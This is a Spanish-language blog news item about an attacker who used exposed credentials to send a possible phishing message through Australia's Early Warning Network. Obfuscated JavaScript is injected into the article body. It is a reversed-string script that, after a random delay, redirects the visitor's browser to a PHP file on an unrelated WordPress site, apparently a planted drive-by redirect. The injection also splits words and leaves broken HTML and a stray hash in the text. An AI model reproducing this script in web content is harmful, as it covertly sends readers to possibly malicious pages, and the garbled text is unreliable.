Sistema de emergencias de Australia hackeado para enviar posible phishing
Una parte de los ciudadanos australianos recibió un mensaje vía email y SMS con un enlace sospechoso a través del servicio de emergencias empleado por el gobierno
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>to-residents-by-a-hacker-data.jpg?w=700&ssl=1″ width=”700″ height=”471″ /></p>
<p>Early Warning Network (EWN), el servicio de emergencias utilizado por los gobiernos locales, estatales y federal de Australia para comunicarse con sus ciudadanos en caso de una emergencia, ha sufrido un acceso no au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
torizado que ha permitido la difusión de un mensaje a través de correo electrónico y SMS. El mensaje incluía un enlace que podría tratarse de un potencial caso de phishing, el cual todavía no se encontraba activo.
4cb4ea41b982b4447508cccb3af7425e
En el mensaje enviado el pasado día 5 de enero se podía leer lo siguiente: “EWN has been hacked. Your personal data is not safe. We are tying to fix the security issues.” (EWN ha sido hackeada. Tus datos personales no están a salvo. Estamos trabajando en arreglar los fallos de seguridad).
Aunque según el mensaje los datos personales de los usuarios se habrían visto afectados, la institución ha asegurado que la información de sus ciudadanos no ha sido expuesta. Por suerte, el fallo fue detectado rápidamente y la difusión del mensaje pudo pararse, por lo que sólo un porcentaje de los usuarios del servicio recibió la comunicación.
Según Kerry Plowright, director de la institución, el atacante habría tenido acceso al servicio a través de unas credenciales de acceso expuestas. No se detalla cómo el atacante pudo tener acceso a dicha información, aunque siendo un servicio empleado por múltiples instituciones, queda patente la necesidad de implementar medidas de doble autenticación, más siendo un servicio crítico de emergencias.
Ver información original al respecto en Fuente:
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.